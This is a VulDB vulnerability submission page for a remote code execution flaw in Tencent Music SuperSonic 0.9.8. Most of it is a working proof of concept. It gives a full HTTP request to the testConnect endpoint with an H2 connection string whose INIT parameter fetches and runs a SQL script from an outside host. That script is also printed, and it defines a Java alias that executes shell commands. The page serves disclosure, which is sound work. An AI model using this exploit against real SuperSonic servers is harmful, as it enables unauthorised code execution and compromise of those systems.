| Titolo | tencentmusic supersonic 0.9.8 Code Injection |
|---|
| Descrizione | Tencent’s Supersonic is a high-performance computing project focused on real-time data analysis and processing, primarily applied in big data, AI, and cloud computing domains.
Vulnerability
An attacker could exploit this system by configuring a malicious H2 database connection string (e.g., via a management console) and triggering the /testConnec API endpoint. This would cause the server to execute attacker-controlled commands via the H2 database’s INIT parameter, ultimately leading to a Remote Code Execution (RCE) vulnerability.
### Poc 1
```
POST /api/semantic/database/testConnect HTTP/1.1
Host: 192.168.137.17:9080
Content-Length: 225
Authorization: Bearer eyJhbGciOiJIUzUxMiJ9.eyJ0b2tlbl91c2VyX2VtYWlsIjoiYWRtaW5AeHguY29tIiwidG9rZW5fdXNlcl9pZCI6MSwidG9rZW5fdXNlcl9kaXNwbGF5X25hbWUiOiJhZG1pbiIsInRva2VuX2NyZWF0ZV90aW1lIjoxNzQyODY5MTkwMTc1LCJ0b2tlbl9pc19hZG1pbiI6MSwidG9rZW5fdXNlcl9uYW1lIjoiYWRtaW4iLCJ0b2tlbl91c2VyX3Bhc3N3b3JkIjoiYzNWd1pYSnpiMjVwWTBCaWFXTnZiZGt0SkpZV3c2QTNyRW1CVVB6Ym4vNkROZVluRCt5M21Bd0RLRU1TM0tWVCIsInN1YiI6ImFkbWluIiwiZXhwIjoxNzQyOTQxMTkwfQ.0RnVDV0MYCK_kP13sWJ6QLjRNCnI6t_CLIIw2qSK66DU39x0sSXagai-gRFuYhtrVRaw9XuYYn0f3fmY4r7Zbg
Accept-Language: zh-CN,zh;q=0.9
Accept: application/json
auth: Bearer eyJhbGciOiJIUzUxMiJ9.eyJ0b2tlbl91c2VyX2VtYWlsIjoiYWRtaW5AeHguY29tIiwidG9rZW5fdXNlcl9pZCI6MSwidG9rZW5fdXNlcl9kaXNwbGF5X25hbWUiOiJhZG1pbiIsInRva2VuX2NyZWF0ZV90aW1lIjoxNzQyODY5MTkwMTc1LCJ0b2tlbl9pc19hZG1pbiI6MSwidG9rZW5fdXNlcl9uYW1lIjoiYWRtaW4iLCJ0b2tlbl91c2VyX3Bhc3N3b3JkIjoiYzNWd1pYSnpiMjVwWTBCaWFXTnZiZGt0SkpZV3c2QTNyRW1CVVB6Ym4vNkROZVluRCt5M21Bd0RLRU1TM0tWVCIsInN1YiI6ImFkbWluIiwiZXhwIjoxNzQyOTQxMTkwfQ.0RnVDV0MYCK_kP13sWJ6QLjRNCnI6t_CLIIw2qSK66DU39x0sSXagai-gRFuYhtrVRaw9XuYYn0f3fmY4r7Zbg
Content-Type: application/json;charset=UTF-8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/x.x.x.x Safari/537.36
Origin: http://192.168.137.17:9080
Referer: http://192.168.137.17:9080/webapp/database
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
{"name":"111","type":"H2","admins":[],"viewers":[],"description":null,"url":"jdbc:h2:mem:testdb;TRACE_LEVEL_SYSTEM_OUT=3;INIT=RUNSCRIPT FROM 'http://192.168.137.5:8888/poc.sql'","username":"333","password":"","database":null}
```
we set a http server on 192.168.137.5:8888 ,Here is poc.sql's content
···
CREATE ALIAS EXEC AS 'String shellexec(String cmd) throws java.io.IOException {Runtime.getRuntime().exec(cmd);return "su18";}';CALL EXEC ('touch /tmp/pwneeeee')
··· |
|---|
| Fonte | ⚠️ https://github.com/tencentmusic/supersonic/issues/2193 |
|---|
| Utente | startr4ck (UID 76213) |
|---|
| Sottomissione | 25/03/2025 10:46 (1 Anno fa) |
|---|
| Moderazione | 03/04/2025 09:11 (9 days later) |
|---|
| Stato | Accettato |
|---|
| Voce VulDB | 303110 [Tencent Music Entertainment SuperSonic fino a 0.9.8 H2 Database Connection testConnect escalationi di privilegi] |
|---|
| Punti | 20 |
|---|